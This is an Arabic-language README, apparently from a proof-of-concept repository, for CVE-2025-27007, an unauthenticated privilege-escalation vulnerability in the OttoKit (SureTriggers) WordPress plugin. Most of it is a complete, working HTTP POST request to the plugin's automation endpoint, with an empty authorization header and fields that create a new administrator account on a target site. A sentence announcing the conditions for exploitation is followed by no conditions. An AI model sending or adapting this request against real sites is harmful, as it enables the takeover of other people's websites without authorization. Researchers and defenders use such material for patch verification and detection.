
استغلال CVE-2025-27007، وهي ثغرة حرجة لتصعيد الامتيازات غير المصادق عليها في إضافة ووردبريس OttoKit (المعروفة سابقًا باسم SureTriggers)
استغلال ثغرة CVE-2025-27007، وهي ثغرة حرجة في تصعيد الامتيازات غير المصرح به في إضافة OttoKit (المعروفة سابقًا باسم SureTriggers) لووردبريس. يوضح هذا المستودع كيف يمكن للمهاجم إنشاء حساب مدير على موقع ووردبريس ضعيف.
يمكن استغلال الثغرة في الظروف التالية:
يستهدف الطلب التالي نقطة النهاية /wp-json/sure-triggers/v1/automation/action لإنشاء حساب مدير:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists